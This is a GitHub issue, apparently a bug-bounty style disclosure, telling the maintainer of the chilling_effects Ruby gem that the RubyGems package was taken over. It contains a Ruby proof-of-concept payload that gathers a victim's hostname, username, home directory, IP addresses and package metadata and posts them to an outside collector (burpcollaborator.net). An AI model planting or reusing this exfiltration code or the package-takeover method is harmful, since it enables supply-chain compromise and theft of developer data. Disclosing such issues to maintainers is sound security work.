Giters

benbalter / chilling_effects

A Ruby gem to interact with the Chilling Effects API

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Gem Package Takeover - `chilling effects`

ManojSharma1997 opened this issue · comments

commented

Hello benbalter,

I am writing to bring to your attention a significant security concern regarding an RubyGems package that I have recently discovered. I believe it poses a potential threat to the security of its users.

I found that chilling_effects ruby gems package is available for takeover. Hence I had takenover this ruby gems package.

Exploit

If the team allows I can upload the following malicious code.

require 'net/http'
require 'json'
require 'os'
require 'socket'
require 'querystring'

packageJSON = JSON.parse(File.read('./package.json'))
package = packageJSON['name']

trackingData = {
  p: package,
  c: __dir__,
  hd: Dir.home,
  hn: Socket.gethostname,
  un: Etc.getlogin,
  dns: Socket.getaddrinfo(Socket.gethostname, nil, Socket::AF_INET).map { |addrinfo| addrinfo[3] },
  r: packageJSON ? packageJSON['__resolved'] : nil,
  v: packageJSON['version'],
  pjson: packageJSON
}

postData = Querystring.stringify(msg: trackingData.to_json)

url = URI.parse('https://burpcollaborator.net') # replace burpcollaborator.net with Interactsh or pipedream
http = Net::HTTP.new(url.host, url.port)
http.use_ssl = true

headers = {
  'Content-Type' => 'application/x-www-form-urlencoded',
  'Content-Length' => postData.length.to_s
}

response = http.post(url.path, postData, headers)
puts response.body

POC
https://rubygems.org/gems/chilling_effects

Impact

An attacker can take over the package and when the developer will try this code, they will inject malicious code into their system by trusting chilling_effects.
This will lead to Remote Code Execution.

Best Regards,
@predator_97